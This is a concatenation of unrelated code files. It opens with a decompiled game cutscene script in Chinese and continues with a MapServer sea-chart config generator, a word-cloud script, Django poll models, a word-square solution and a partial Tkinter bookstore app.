"你不喜欢这个地方呢。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#003F#2P……………………………\x02",
)
CloseMessageWindow()
def lambda_1368():
OP_6E(450, 3000)
ExitThread()
QueueWorkItem(0x0, 1, lambda_1368)
OP_20(0x7D0)
Sleep(1000)
OP_8C(0x101, 180, 300)
OP_21()
OP_1D(0x53)
Sleep(1000)
ChrTalk(
0x101,
(
"#000F#2P我喜欢这个地方啊。\x01",
"不过,我不会随便来这里的。\x02\x03",
"#500F这是我妈妈……\x01",
"去世的地方。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#014F#6P……哎………\x02",
)
CloseMessageWindow()
FadeToDark(2000, 0, -1)
OP_0D()
OP_AD(0x40019, 0x0, 0x0, 0x64)
Sleep(3000)
SetMessageWindowPos(72, 320, 56, 3)
SetChrName("艾丝蒂尔")
AnonymousTalk(
(
scpstr(SCPSTR_CODE_COLOR, 0xC),
"10年前战争的时候……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
"包围洛连特的帝国军队\x01",
"为了迫使这里的市民投降,\x01",
"而向作为城市象征的钟楼开炮。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
"那个时候,\x01",
"爸爸作为王国军的军人参加了战斗……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
"我……为了要看看\x01",
"和爸爸战斗的对手是什么样的人,\x01",
"自己一个人登上了这座钟楼……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
"但是……就连逃跑的机会都没有,钟楼突然倒塌了。\x02",
)
CloseMessageWindow()
OP_56(0x0)
OP_AE(0xC8)
Sleep(2000)
OP_AD(0x4001A, 0x0, 0x0, 0x64)
Sleep(3000)
SetChrName("艾丝蒂尔")
AnonymousTalk(
(
"不过,当我回过神来的时候,\x01",
"却发现自己毫发无伤……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
"是妈妈……保护了我……\x02",
)
CloseMessageWindow()
AnonymousTalk(
(
"她用双臂紧紧地抱着我,\x01",
"为我挡住了大量瓦砾的撞击。\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
(
"而且,还为哭个不停的我\x01",
"唱起了我最喜欢的摇篮曲……\x02",
)
)
CloseMessageWindow()
AnonymousTalk(
"然后……然后……\x02",
)
CloseMessageWindow()
AnonymousTalk(
"当瓦砾被清除之后……\x02",
)
CloseMessageWindow()
OP_56(0x0)
OP_AE(0x64)
FadeToBright(2000, 0)
OP_0D()
Sleep(2000)
ChrTalk(
0x101,
(
"#003F#2P………………………\x02\x03",
"……战争结束了,\x01",
"这里也被修复成原来的样子。\x01",
"不过自那以后,我就很少来过……\x02\x03",
"因为那是一段非常痛苦的回忆……\x02\x03",
"#500F一来到这里,\x01",
"心里就不由得有种想要依赖妈妈的感觉……\x02\x03",
"可是,要是依赖了妈妈,\x01",
"就不能像妈妈那样坚强起来了……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#013F#6P艾丝蒂尔……\x02",
)
CloseMessageWindow()
TurnDirection(0x101, 0x102, 400)
ChrTalk(
0x101,
(
"#501F#2P不过,没关系吧?\x01",
"至少今天让我依赖一下……\x02\x03",
"让我向妈妈祈求,\x01",
"保佑爸爸平安归来也好……\x02\x03",
"让我向妈妈祈求,\x01",
"在天国一直守护着爸爸也好……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#015F#6P……当然可以了。\x02",
)
CloseMessageWindow()
def lambda_192E():
OP_6D(53840, 10300, 44180, 1500)
ExitThread()
QueueWorkItem(0x0, 1, lambda_192E)
OP_92(0x102, 0x101, 0x1F4, 0x3E8, 0x0)
WaitChrThread(0x0, 0x1)
ChrTalk(
0x102,
(
"#012F#6P放心吧……\x01",
"父亲一定会平安无事的。\x02\x03",
"有你母亲守护着他,\x01",
"一定会没事的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#003F#2P…………………………\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#010F#6P就算万一真的出了问题,\x01",
"还有艾丝蒂尔你可以帮助他啊。\x02\x03",
"以前母亲救了你,\x01",
"这次该由你去救父亲了。\x02\x03",
"我也会帮忙的。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
"#003F#2P……约修亚…………\x02",
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#013F#6P你的心情,\x01",
"我虽然不能完全体会……\x02\x03",
"不过像这样呆在你身边……\x01",
"我还是能做到的。\x02\x03",
"#010F如果不介意的话,\x01",
"我的胸膛随时可以借你一用。\x02\x03",
"所以……\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#500F#2P…………………………\x02\x03",
"#008F……………噗~\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#014F#6P哎?\x02",
)
CloseMessageWindow()
OP_20(0x5DC)
OP_21()
OP_1D(0x1)
ChrTalk(
0x101,
(
"#001F#2P啊哈哈哈哈~!\x01",
"约修亚你在耍什么帅啊~\x02\x03",
"真是的……\x01",
"这种话你也能这么随便说出来。\x02",
)
)
CloseMessageWindow()
OP_62(0x102, 0x0, 2000, 0x28, 0x2B, 0x64, 0x3)
def lambda_1C5E():
OP_6D(54620, 10300, 44190, 700)
ExitThread()
QueueWorkItem(0x0, 1, lambda_1C5E)
OP_8F(0x102, 0xD7D2, 0x283C, 0xAC76, 0xBB8, 0x0)
Sleep(1000)
ChrTalk(
0x102,
"#014F#6P哎、哎哎……?\x02",
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#507F#2P如果是其它女孩的话,\x01",
"肯定会完全误解啦。\x02\x03",
"约修亚你啊,\x01",
"将来准是个整日被绯闻缠身的男人。\x02\x03",
"#007F呼~\x01",
"做姐姐的还真是担心啊。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#012F#6P真、真是抱歉,我这么随便。\x02\x03",
"#013F真是的……\x01",
"人家特意这么关心你。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#008F#2P嘿嘿……\x01",
"谢谢你的鼓励啦。\x02\x03",
"不管怎么说,有点干劲了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
(
"#018F#6P哼,你能这样说,\x01",
"我刚才装帅也是值得了。\x02\x03",
"#017F真是……唉唉。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x101,
(
"#001F#2P别在意,别在意。\x01",
"我刚才不是说了谢谢嘛。\x02\x03",
"#006F那么……\x01",
"我们该下去了吧?\x02\x03",
"雪拉姐肯定在等着了。\x02",
)
)
CloseMessageWindow()
ChrTalk(
0x102,
"#010F#6P是啊,我们下去吧。\x02",
)
CloseMessageWindow()
def lambda_1FCF():
OP_6D(54240, 10300, 47980, 4000)
ExitThread()
QueueWorkItem(0x0, 1, lambda_1FCF)
def lambda_1FE7():
OP_67(0, 6220, -10000, 4000)
ExitThread()
QueueWorkItem(0x1, 1, lambda_1FE7)
def lambda_1FFF():
OP_6C(324000, 4000)
ExitThread()
QueueWorkItem(0x0, 2, lambda_1FFF)
def lambda_200F():
OP_6E(470, 4000)
ExitThread()
QueueWorkItem(0x1, 2, lambda_200F)
OP_43(0x102, 0x0, 0x0, 0xA)
Sleep(3000)
SetChrFlags(0x102, 0x4)
OP_8E(0x101, 0xCD12, 0x283C, 0xB5C7, 0xBB8, 0x0)
Sleep(1000)
ChrTalk(
0x101,
"#500F……………………\x02",
)
CloseMessageWindow()
OP_8C(0x101, 135, 400)
Sleep(1000)
ChrTalk(
0x101,
(
"#006F(妈妈,\x01",
" 我终于明白了……)\x02\x03",
"(我以游击士作为自己的目标,\x01",
" 是因为想像妈妈那样\x01",
" 为了保护别人而变得坚强起来……)\x02\x03",
"(所以,请等着我……)\x02\x03",
"(我一定……\x01",
" 我一定会把爸爸平安带回来的!)\x02",
)
)
CloseMessageWindow()
FadeToDark(2000, 0, -1)
OP_43(0x101, 0x0, 0x0, 0xB)
OP_0D()
SetChrFlags(0x102, 0x80)
SetMapFlags(0x2000000)
OP_A2(0x3FB)
NewScene("ED6_DT01/T0100 ._SN", 113, 0, 0)
IdleLoop()
Return()
# Function_9_10D1 end
def Function_10_2161(): pass

label("Function_10_2161")
# Cutscene helper: walk character 0x102 (Joshua) along the OP_8E waypoints
# to the ladder, turn, descend (OP_96 / OP_8F vertical moves) and hide the
# sprite (flag 0x80).
SetChrFlags(0x102, 0x4)
OP_8E(0x102, 0xCC9C, 0x283C, 0xB536, 0x7D0, 0x0)
OP_8E(0x102, 0xCC88, 0x283C, 0xBB08, 0x7D0, 0x0)
OP_8E(0x102, 0xCE72, 0x283C, 0xBB94, 0x7D0, 0x0)
SetChrFlags(0x102, 0x4)
OP_8C(0x102, 270, 400)
OP_96(0x102, 0xD1C4, 0x251C, 0xBCA4, 0x258, 0x1388)
Sleep(500)
OP_8F(0x102, 0xD1C4, 0x206C, 0xBCA4, 0xBB8, 0x0)
SetChrFlags(0x102, 0x80)
Return()
# Function_10_2161 end
def Function_11_21E4(): pass

label("Function_11_21E4")
# Cutscene helper: same ladder-descent path as Function_10 but for
# character 0x101 (Estelle); ends with the sprite hidden (flag 0x80).
SetChrFlags(0x101, 0x4)
OP_8E(0x101, 0xCC88, 0x283C, 0xBB08, 0x7D0, 0x0)
OP_8E(0x101, 0xCE72, 0x283C, 0xBB94, 0x7D0, 0x0)
OP_8C(0x101, 270, 400)
OP_96(0x101, 0xD1C4, 0x251C, 0xBCA4, 0x258, 0x1388)
Sleep(500)
OP_8F(0x101, 0xD1C4, 0x206C, 0xBCA4, 0xBB8, 0x0)
SetChrFlags(0x101, 0x80)
Return()
# Function_11_21E4 end
# Helper-defined entry sequence: SaveToFile() arms the scenario output and
# Try(main) executes main() under the helper's error-reporting wrapper.
# NOTE(review): ordering comes from ED6ScenarioHelper -- confirm there.
SaveToFile()
Try(main)
|
#!/usr/bin/python2
from __future__ import print_function
import os
import csv
import re
import subprocess
from string import Template
from osgeo import ogr
from .chartsymbols import ChartSymbols
from utils import dirutils
def generate_includes(includes_dir, theme):
    """Build the joined mapserver INCLUDE directives for one theme.

    Scans *includes_dir* for entries whose names start with *theme*,
    sorts them so they land in the target map file in a stable order,
    and renders each as an INCLUDE line whose path is relative to the
    directory's basename.
    """
    matching = sorted(
        entry for entry in os.listdir(includes_dir)
        if entry.startswith(theme)
    )
    rel_path = os.path.basename(includes_dir)
    directives = ['INCLUDE "{}/{}"'.format(rel_path, entry)
                  for entry in matching]
    return "\n ".join(directives)
def get_dictionary(theme, map_path, fonts_path, debug_string):
    """Assemble the template-substitution mapping for one theme's map file."""
    mapping = {}
    mapping['THEME'] = theme
    mapping['HOST'] = 'http://localhost/cgi-bin/mapserv.fcgi'
    mapping['DEBUG'] = debug_string
    mapping['MAP_PATH'] = map_path
    mapping['FONTS_PATH'] = fonts_path
    # INCLUDE lines come from the theme-matching files under map_path/includes.
    mapping['INCLUDES'] = generate_includes(
        os.path.join(map_path, "includes"), theme)
    mapping['SHAPEPATH'] = "../shape/"
    return mapping
# Mapserver debug snippet spliced into generated map files when debugging
# is enabled; {0} is filled with the theme name via str.format.
debug_template = '''CONFIG "MS_ERRORFILE" "/tmp/SeaChart_{0}.log"
DEBUG 5
CONFIG "ON_MISSING_DATA" "LOG"'''
def create_capability_files(template_path, themes_path, map_path, fonts_path,
                            use_debug, shapepath):
    """Generate one SeaChart_<theme>.map capability file per color theme.

    Reads the SeaChart_THEME.map template once, then writes a substituted
    copy into *map_path* for every theme file found in *themes_path*.
    *shapepath*, when truthy, overrides the default SHAPEPATH value.
    """
    # Fix: read the template with a context manager -- the original leaked
    # the template handle and every per-theme output handle.
    with open(os.path.join(template_path, "SeaChart_THEME.map"), 'r') as f:
        template = Template(f.read())
    for theme in os.listdir(themes_path):
        # Remove file suffix
        theme = os.path.splitext(theme)[0]
        debug_string = ""
        if use_debug:
            debug_string = str.format(debug_template, theme)
        d = get_dictionary(theme, map_path, fonts_path, debug_string)
        if shapepath:
            d['SHAPEPATH'] = shapepath
        out_name = os.path.join(map_path, "SeaChart_" + theme + ".map")
        with open(out_name, 'w') as fileout:
            fileout.write(template.substitute(d))
def create_legend_files(template_path, themes_path, map_path, fonts_path,
                        use_debug):
    """Generate one SeaChart_Legend_<theme>.map file per color theme.

    Output files go under the "legends" subdirectory of *map_path*
    (created on demand by dirutils.force_sub_dir).
    """
    with open(os.path.join(template_path, "SeaChart_Legend_THEME.map")) as f:
        template = Template(f.read())
    for theme in os.listdir(themes_path):
        # Remove file suffix
        theme = os.path.splitext(theme)[0]
        debug_string = ""
        if use_debug:
            debug_string = str.format(debug_template, theme)
        d = get_dictionary(theme, map_path, fonts_path, debug_string)
        legend_path = dirutils.force_sub_dir(map_path, "legends")
        # Fix: close each output file promptly (the original leaked the
        # handle, so writes were only flushed at interpreter shutdown).
        out_name = os.path.join(
            legend_path, "SeaChart_Legend_" + theme + ".map")
        with open(out_name, 'w') as fileout:
            fileout.write(template.substitute(d))
def generate_basechart_config(data_path, map_path, rule_set_path, resource_dir,
                              force_overwrite, debug, point_table, area_table,
                              displaycategory, chartsymbols, excluded_lookups,
                              maxscale_shift, symbol_size_override):
    """Regenerate the complete basechart mapserver config under *map_path*."""
    # Generate new map files
    dirutils.clear_folder(map_path)
    # Fix: always bind shapepath.  It was previously assigned only inside
    # the `if chartsymbols:` branch, so the create_capability_files() call
    # below raised NameError whenever no chartsymbols file was supplied.
    shapepath = None
    if chartsymbols:
        shapepath = data_path
        process_all_layers(data_path, map_path, rule_set_path, point_table,
                           area_table, displaycategory, chartsymbols,
                           excluded_lookups, maxscale_shift,
                           symbol_size_override)
    fonts_path = os.path.join("./fonts", "fontset.lst")
    create_capability_files(os.path.join(resource_dir, "templates"),
                            os.path.join(rule_set_path, "color_tables"),
                            map_path, fonts_path, debug, shapepath)
    create_legend_files(os.path.join(resource_dir, "templates"),
                        os.path.join(rule_set_path, "color_tables"),
                        map_path, fonts_path, debug)
    # Ship the static resources (projection db, symbols, fonts) next to
    # the generated map files.
    dirutils.copy_and_replace(os.path.join(
        resource_dir, "epsg"), os.path.join(map_path, "epsg"))
    dirutils.copy_and_replace(os.path.join(
        resource_dir, "symbols"), os.path.join(map_path, "symbols"))
    dirutils.copy_and_replace(os.path.join(
        resource_dir, "fonts"), os.path.join(map_path, "fonts"))
def get_maxscaledenom(config):
    """Load the per-layer max scale denominators from layer_msd.csv.

    Returns a dict mapping layer id (CSV column 0) to its max scale
    denominator (column 1); both are kept as strings.
    """
    csv_path = config + '/layer_rules/layer_msd.csv'
    with open(csv_path, 'r') as csvfile:
        return {row[0]: row[1] for row in csv.reader(csvfile)}
def get_colors(color_table):
    """Read a color CSV (code, rgb_color, hex_color) into a lookup table.

    Returns a dict mapping each color code to an (rgb, hex) tuple.
    """
    with open(color_table, 'r') as csvfile:
        return {row[0]: (row[1], row[2]) for row in csv.reader(csvfile)}
def process_all_layers(data, target, config, point_table='Simplified',
                       area_table='Plain', displaycategory=None,
                       chartsymbols_file=None, excluded_lookups=None,
                       maxscale_shift=None,
                       symbol_size_override=None):
    """Generate map layers for every color theme and chart level.

    Reimplementation of the shell script of the same name.  When a
    chartsymbols file is given, first inspects each shapefile (geometry
    type via the external ``ogrinfo`` tool, field names via the ogr
    bindings), then renders every color theme found under
    ``config/color_tables``.
    """
    msd = get_maxscaledenom(config)
    chartsymbols = None
    if chartsymbols_file:
        chartsymbols = ChartSymbols(
            chartsymbols_file, point_table, area_table, displaycategory,
            excluded_lookups=excluded_lookups,
            symbol_size_override=symbol_size_override,
            maxscale_shift=maxscale_shift,
        )
    # Test if the shapefile is of the right Geometry
    shp_types = {}
    shp_fields = {}
    if chartsymbols:
        # Map ogrinfo's geometry names to the tokens used in template names.
        geometries = {
            'Point': 'POINT',
            'Line': 'LINESTRING',
            'Polygon': 'POLYGON',
            '3D Point': 'POINT',
        }
        print("Check geometry of all layers...")
        for (dirpath, dirnames, filenames) in os.walk(data):
            for filename in filenames:
                if filename.endswith('.shp'):
                    # Chart level (usage band) is the 3rd character of the name.
                    level = filename[2:3]
                    # NOTE(review): print(..., flush=True) needs Python 3's
                    # print, but the shebang says python2 -- confirm which
                    # interpreter actually runs this module.
                    print("checking {}".format(filename),
                          end=(' ' * 18 + '\r'), flush=True)
                    # Shell out to ogrinfo for a summary-only dump and parse
                    # the geometry type from it.
                    output = subprocess.check_output(
                        ["ogrinfo", "-al", "-so",
                         '{}/{}/{}'.format(data, level, filename)],
                        stderr=subprocess.STDOUT).decode()
                    geomtype = re.search(
                        r'Geometry: (.+)$', output, re.IGNORECASE)
                    if geomtype:
                        try:
                            shp_types[filename] = geometries[geomtype.group(1)]
                        except KeyError:
                            shp_types[filename] = 'UNKNOWN'
                    # Collect the attribute field names via the ogr bindings.
                    ds = ogr.Open('{}/{}/{}'.format(data, level, filename))
                    try:
                        layer = ds.GetLayer()
                        defn = layer.GetLayerDefn()
                        shp_fields[filename] = [
                            defn.GetFieldDefn(i).GetName()
                            for i in range(defn.GetFieldCount())
                        ]
                    finally:
                        ds.Destroy()
    #
    # Process all color themes
    #
    for color in os.listdir(config + '/color_tables/'):
        print("Loading " + color)
        # theme = os.path.splitext("path_to_file")[0]
        if chartsymbols:
            # color[:-4] strips the ".csv" suffix to get the theme name.
            chartsymbols.load_colors(color[:-4])
        for layer in os.listdir(data):
            # Only numeric directories are chart levels.
            if not layer.isdigit():
                continue
            color_table = config + '/color_tables/' + color
            input_file = config + '/layer_rules/layer_groups.csv'
            process_layer_colors(layer, color_table, input_file,
                                 msd[layer], data, target, chartsymbols,
                                 shp_types, shp_fields)
def get_layer_mapfile(layer, feature, group, color_table, msd):
    """Fill a MapServer layer template for one feature of one chart level.

    Args:
        layer: chart level as a string (used in names and paths).
        feature: S-57 feature acronym, optionally suffixed with '-POINT',
            '-LINESTRING' or '-POLYGON' to select an "enhanced" template.
        group: MapServer GROUP name substituted into the template.
        color_table: path to the color table file for the current theme.
        msd: maximum scale denominator substituted into the template.

    Returns:
        The filled-in template text, or '' if no template file exists.
    """
    enhanced = False
    # enhanced feature name
    template_path = '../resources/templates/basechart_templates/'
    if feature[-5:] == 'POINT':
        enhanced = True
        template = template_path + 'point-{}_template_color.map'.format(
            feature[:-6])
    elif feature[-10:] == 'LINESTRING':
        enhanced = True
        template = template_path + 'line-{}_template_color.map'.format(
            feature[:-11])
    elif feature[-7:] == 'POLYGON':
        enhanced = True
        template = template_path + 'poly-{}_template_color.map'.format(
            feature[:-8])
    else:
        template = template_path + '{}_template_color.map'.format(feature)
    # Shapefile base name differs between classic ('-') and enhanced ('_').
    if not enhanced:
        base = "CL{}-{}".format(layer, feature)
    else:
        base = "CL{}_{}".format(layer, feature)
    mapfile = ''
    if not os.path.isfile(template):
        return mapfile
    colors = get_colors(color_table)
    def get_hex_color(match):
        # Replacement callback: '{XXXXX}' -> hex value of S-52 color token.
        return colors[match.group(1)][1]
    def get_rgb_color(match):
        # Replacement callback: '{XXXXX_rgb}' -> RGB triple of the token.
        return colors[match.group(1)][0]
    # print "Layer: {} Processing feature: {}.".format(layer, feature)
    with open(template, 'r') as templ:
        mapfile = templ.read()
    mapfile = re.sub(r'{CL}', layer, mapfile)
    mapfile = re.sub(r'{PATH}', '{}/{}'.format(layer, base), mapfile)
    mapfile = re.sub(r'{PATH_OGR}', '{}/{}.shp'.format(layer, base), mapfile)
    mapfile = re.sub(r'{OGR_SQL_LAYER}', base, mapfile)
    mapfile = re.sub(r'{MAXSCALE}', msd, mapfile)
    mapfile = re.sub(r'{GROUP}', group, mapfile)
    # Exactly five characters between braces: the hex pass cannot touch the
    # longer '{XXXXX_rgb}' placeholders handled on the next line.
    mapfile = re.sub(r'{(.....)}', get_hex_color, mapfile)
    mapfile = re.sub(r'{(.....)_rgb}', get_rgb_color, mapfile)
    return mapfile
def get_navigation_level(layer):
    """Map a chart level number (as a string) to its navigation level name.

    Unknown levels map to 'default'.
    """
    levels = {
        '1': 'Overview',
        '2': 'General',
        '3': 'Coastal',
        '4': 'Approach',
        '5': 'Harbour',
        '6': 'Berthing',
    }
    return levels.get(layer, 'default')
def get_metadata_name(s57objectname):
    """Return the human-readable name for an S-57 object class acronym.

    Looks the acronym up in column 2 of ``s57objectclasses.csv`` and returns
    the description from column 1; falls back to the acronym itself when no
    row matches.

    Fixes vs. original: the redundant ``objFile.close()`` inside the ``with``
    block is gone (the context manager already closes the file), and the scan
    stops at the first match instead of reading the whole catalogue.
    """
    with open('../../s57objectclasses.csv', 'r') as obj_file:
        for row in csv.reader(obj_file):
            if row[2] == s57objectname:
                # Acronyms are unique in the S-57 object catalogue, so the
                # first hit is the answer -- presumably; TODO confirm there
                # are no duplicate acronym rows.
                return row[1]
    return s57objectname
def process_layer_colors(layer, color_table, input_file, msd, data, target,
                         chartsymbols=None, shp_types={}, shp_fields={}):
    """Write the per-theme include mapfile for one chart level.

    Reimplementation of the shell script of the same name.  Without
    ``chartsymbols`` it walks the layer_groups.csv rules; with it, it walks
    the shapefiles on disk and asks ChartSymbols for each layer definition.

    NOTE(review): the mutable default arguments ``shp_types``/``shp_fields``
    are only read, never mutated here, so they are harmless -- but confirm
    before adding writes to them.
    """
    # Create directory
    try:
        os.mkdir(target + '/includes')
    except OSError:
        # Already exist
        pass
    # Theme name is the color-table file name without extension.
    theme = os.path.splitext(os.path.basename(color_table))[0]
    # File that will contain the result
    final_file = open(
        '{}/includes/{}_layer{}_inc.map'.format(target, theme, layer), 'w')
    if not chartsymbols:
        # Rule-driven path: one mapfile fragment per layer_groups.csv row.
        with open(input_file, 'r') as if_csv:
            reader = csv.reader(if_csv)
            next(reader, None)  # skip the headers
            for row in reader:
                feature = row[0]
                group = row[1]
                data_file = '{0}/{1}/CL{1}-{2}.shp'.format(
                    data, layer, feature)
                if os.path.isfile(data_file):
                    mapfile = get_layer_mapfile(
                        layer, feature, group, color_table, msd)
                    if mapfile:
                        final_file.write(mapfile)
    else:
        # Symbology-driven path: walk the shapefiles of this level.
        layers = []
        for (base, dirs, filenames) in os.walk('{0}/{1}/'.format(data, layer)):
            for filename in filenames:
                if filename.endswith('.shp'):
                    # Names look like 'CL5_BOYSPP_POINT.shp': [4:10] is the
                    # six-char S-57 acronym, [11:] the geometry suffix.
                    feature = os.path.splitext(filename)[0][4:10]
                    geom = os.path.splitext(filename)[0][11:]
                    if shp_types and not shp_types[filename] in geom:
                        print("{} does not match geometry: {} in {}".format(
                            filename, shp_types[filename], geom))
                        continue
                    # we will push a readable name in metadata for this layer
                    metadata_name = get_metadata_name(feature)
                    # we will push a readable Group name based on Navigation
                    # level
                    group_layer = get_navigation_level(layer)
                    if geom == 'POINT':
                        layer_obj = chartsymbols.get_point_mapfile(
                            layer, feature, group_layer, msd,
                            shp_fields[filename], metadata_name)
                    elif geom == 'LINESTRING':
                        layer_obj = chartsymbols.get_line_mapfile(
                            layer, feature, group_layer, msd,
                            shp_fields[filename], metadata_name)
                    elif geom == 'POLYGON':
                        layer_obj = chartsymbols.get_poly_mapfile(
                            layer, feature, group_layer, msd,
                            shp_fields[filename], metadata_name)
                    else:
                        # Unknown geometry suffix: skip the file.
                        continue
                    layers.append(layer_obj)
        final_file.write('\n'.join(l.mapfile for l in sorted(layers) if l))
    final_file.write("""
#
# Dummy layer to flush the label cache
#
LAYER
 NAME "force_label_draw_CL${CL}"
 GROUP %s
 TYPE POINT
 PROCESSING FORCE_DRAW_LABEL_CACHE=FLUSH
 TRANSFORM FALSE
 STATUS ON
 FEATURE
  POINTS 1 1 END
 END
 METADATA
  "ows_title" "Force layer to flush cache"
  "ows_enable_request" "* !GetFeatureInfo"
  "gml_include_items" "all"
  "wms_feature_mime_type" "text/html"
 END
END
""" % get_navigation_level(layer))
    final_file.close()
|
"""Build a word cloud of the most frequent words in 19.txt, masked by map.png.

Fixes vs. original: wildcard imports replaced with explicit ones (the star
imports shadowed names such as ``figure``), the input file is closed via a
``with`` block, and the figure handle no longer shadows ``pyplot.figure``.
"""
from collections import Counter

import jieba
import matplotlib.pyplot as plt
import numpy as np
from PIL import Image
from wordcloud import WordCloud

fig = plt.figure()
with open('19.txt') as data_file:
    data = data_file.read()
words = jieba.cut(data, cut_all=False)
# Stop words; many more meaningless tokens exist -- this is just an example.
remove_words = {u'\n', u'\t', u'。', u',', u'、', u'的', u'和'}
words_list = [word for word in words if word not in remove_words]
words_counts = Counter(words_list)
# Show the ten most common words with their counts.
for word_top in words_counts.most_common(10):
    print(str(word_top[0]), str(word_top[1]))
background = np.array(Image.open('map.png'))
words_config = WordCloud(mask=background, scale=8, prefer_horizontal=1,
                         max_font_size=100, max_words=len(words_list),
                         colormap='Reds',
                         font_path='C:/Windows/Fonts/simhei.ttf',
                         background_color='white')
words_config.generate_from_frequencies(words_counts)
plt.imshow(words_config)
plt.axis('off')
fig.set_size_inches(1024 / 100, 1024 / 100)
plt.subplots_adjust(bottom=0.05, top=0.95, right=1, left=0)
plt.savefig('19.jpg', dpi=500)
plt.show()
# 如果觉得本视频有用,请素质三连支持一波!谢谢!
# (If you found this video useful, please like/comment/subscribe! Thanks!)
# BY TONYMOT
#-*- coding:utf-8 -*-
from django.db import models
from django.contrib.auth.models import User
from django.utils import timezone
import datetime
# Create your models here.
class Person(models.Model):
    # A named person with an age (demo model).
    name = models.CharField(max_length=30)
    age = models.IntegerField()
    def __unicode__(self):
        # Python 2 style display name (used by the admin and shell).
        return self.name
class Subject(models.Model):
    """A poll subject/question that users vote on."""
    title = models.CharField(max_length=30)
    createtime = models.DateField(auto_now_add=True)
    # BUG FIX: pass the callable, not its result.  ``default=timezone.now()``
    # is evaluated once at import time, freezing every new row's deadline at
    # server-start time; ``default=timezone.now`` is evaluated per row.
    deadline = models.DateTimeField(auto_now_add=False, auto_now=False,
                                    default=timezone.now)
    #status = models.BooleanField(default=True)
    hot = models.CharField(max_length=60,default=u'无人得票')
    class Meta:
        # Newest subjects first.
        ordering = ['-createtime']
    def __unicode__(self):
        return self.title
class Option(models.Model):
    # One selectable answer belonging to a Subject.
    # NOTE: ForeignKey without on_delete implies Django < 2.0.
    subject = models.ForeignKey(Subject)
    name = models.CharField(max_length=30)
    def __unicode__(self):
        return self.name
class VoteRecord(models.Model):
    # Records that a user voted for a particular option.
    # NOTE: ForeignKey without on_delete implies Django < 2.0.
    user = models.ForeignKey(User)
    option = models.ForeignKey(Option)
    def __unicode__(self):
        # Identified by primary key only.
        return u'%s' % self.id
|
class Solution(object):
    def validWordSquare(self, words):
        """Return True if *words* forms a valid word square.

        A word square requires the k-th row and the k-th column to read the
        same string.  This checks, for every character at (i, j), that the
        mirrored position (j, i) exists and holds the same character.

        Fixes vs. original: the old version padded every row to
        ``len(words[0])`` before comparing with the zip-transpose, which
        mishandles degenerate inputs such as [""] (a valid square) and does
        extra work building both matrices.
        """
        for i, word in enumerate(words):
            for j, ch in enumerate(word):
                # Character (i, j) must exist at (j, i) and match it.
                if j >= len(words) or i >= len(words[j]) or words[j][i] != ch:
                    return False
        return True
"""
A program that stores book information:
Title, Author, Year, ISBN
User can:
View all records
Search all entry
Add entry
Update entry
Delete entry
Close app
"""
from tkinter import *
import backend
# def get_selected_row(event):
# global selected_tuple
# if list1.size() > 0:
# index = list1.curselection()[0]
# selected_tuple = list1.get(index)
# e1.delete(0, END)
# e1.insert(END, selected_tuple[1])
# e2.delete(0, END)
# e2.insert(END, selected_tuple[2])
# e3.delete(0, END)
# e3.insert(END, selected_tuple[3])
# e4.delete(0, END)
# e4.insert(END, selected_tuple[4])
def get_selected_row(event):
    """Remember the clicked listbox row and copy its fields into the entries.

    Stores the selected record in the module-global ``selected_tuple`` so the
    update/delete commands can use it.  Clicks on an empty listbox (or a
    short tuple) are silently ignored, as in the original.
    """
    global selected_tuple
    try:
        selected_tuple = list1.get(list1.curselection()[0])
        for entry, value in zip((e1, e2, e3, e4), selected_tuple[1:5]):
            entry.delete(0, END)
            entry.insert(END, value)
    except IndexError:
        pass
def view_command():
    """Clear the listbox and reload it with every record in the database."""
    list1.delete(0, END)
    for record in backend.view():
        list1.insert(END, record)
def search_command():
    """Show only the records matching the current entry-field values."""
    list1.delete(0, END)
    matches = backend.search(title_text.get(), author_text.get(),
                             year_text.get(), ISBN_text.get())
    for match in matches:
        list1.insert(END, match)
def insert_command():
    """Add a record when both title and author are non-empty, then refresh.

    Fixes vs. original: uses the boolean ``and`` instead of the bitwise
    ``&`` on the two comparisons -- same result here, but ``and`` is the
    correct operator and short-circuits.
    """
    if title_text.get() != "" and author_text.get() != "":
        backend.insert(title_text.get(), author_text.get(),
                       year_text.get(), ISBN_text.get())
        view_command()
def delete_command():
    """Delete the record last selected in the listbox, then refresh."""
    # selected_tuple[0] is the primary key captured by get_selected_row().
    # NOTE(review): raises NameError if nothing was ever selected -- confirm
    # that is acceptable.
    backend.delete(selected_tuple[0])
    view_command()
# def update_command():
# backend.update(selected_tuple[0],selected_tuple[1],selected_tuple[2],selected_tuple[3], selected_tuple[4])
def update_command():
    """Overwrite the selected record with the current entry-field values."""
    # selected_tuple[0] is the primary key captured by get_selected_row().
    backend.update(selected_tuple[0], e1.get(), e2.get(), e3.get(), e4.get())
    view_command()
# ---- GUI construction ----
window = Tk()
window.wm_title("Book Store")

# Field labels.
l1 = Label(window, text="Title")
l1.grid(row=0, column=0)
l2 = Label(window, text="Author")
l2.grid(row=0, column=2)
l3 = Label(window, text="Year")
l3.grid(row=1, column=0)
l4 = Label(window, text="ISBN")
l4.grid(row=1, column=2)

# Entry fields bound to StringVars, read by the command callbacks.
title_text = StringVar()
e1 = Entry(window, textvariable=title_text)
e1.grid(row=0, column=1)
author_text = StringVar()
e2 = Entry(window, textvariable=author_text)
e2.grid(row=0, column=3)
year_text = StringVar()
e3 = Entry(window, textvariable=year_text)
